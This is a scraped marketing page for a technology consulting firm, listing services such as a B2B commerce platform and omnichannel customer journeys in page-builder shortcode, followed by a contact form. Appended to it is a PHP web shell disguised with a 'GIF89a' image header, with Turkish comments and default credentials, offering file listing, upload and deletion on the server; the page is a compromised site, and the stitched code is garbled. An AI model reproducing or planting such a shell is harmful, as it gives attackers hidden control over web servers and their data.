Tech envisioning & deployment
[/h_dd] [text_dd]We are strategic partners in shaping the future of technology. Explore how we transform innovative ideas into real-world solutions that drive success for your business advanced technologies and strategies to help businesses success for your business.[/text_dd] [spacer_dd pixels="30"][/spacer_dd] [metro_box_dd title="B2B Commerce Platform" icon="whhg-imac" icon_color="#ffffff" box_color="#ffffff" link="/b2b-commerce-platform/" target="_self" class="icon_arrow"][/metro_box_dd] [metro_box_dd title="Omnichannel customer journey" icon="whhg-navigation" icon_color="#ffffff" box_color="#ffffff" link="/omnichannel-customer-journey" target="_self" class="icon_arrow"][/metro_box_dd] [metro_box_dd title="Process & model innovation" icon="whhg-flowup" icon_color="#ffffff" box_color="#ffffff" link="/process-and-model-innovation" target="_self" class="icon_arrow"][/metro_box_dd] [/column_dd] [/section_dd] [section_dd fullwidth="0" no_column_margin="0" equalize_five="0" video_bg="0" bg_color="#f7f7f7" section_id="cta_bottom" class="no_padding"] [column_dd span="12"] [callout_box_dd title="START NOW YOUR DIGITAL TRANSFORMATION CHALLENGE!" button_text="CONTACT US" button_size="medium" button_color="orange" button_style="large" button_url="javascript:;" button_target="_self" class="cta-collapse-action"][/callout_box_dd] [/column_dd] [/section_dd] [section_dd fullwidth="0" no_column_margin="0" equalize_five="0" video_bg="0" bg_color="#f7f7f7" section_id="contact-us" class="hide header_title_without_after section_with_header no_padding_top"] [column_dd span="3"] [/column_dd] [column_dd span="6"] [contact-form-7 id="4227" html_id="contact-form-4227"][/contact-form-7] [/column_dd] [column_dd span="3"] [/column_dd] [/section_dd] GIF89a; # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>| Name | Size | Modified | Perms | Actions | |
|---|---|---|---|---|---|
| " . $folder . " | --- | ". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . " | 0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . " | ||
| " . fileIcon($file) . $file . " | " . formatSizeUnits(filesize(PATH . "/" . $file)) . " | " . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . " | 0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . " |
".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.
"; } else { echo "Sorry, there was an error uploading your file.
"; } } if (isset($_GET['d']) && isset($_GET['q'])) { $name = PATH . "/" . $_GET['d']; if (is_file($name)) { if(unlink($name)) { echo (""); } else { echo (""); } } elseif (is_dir($name)) { if(rmdir($name) == true) { echo (""); } else { echo (""); } } } ?>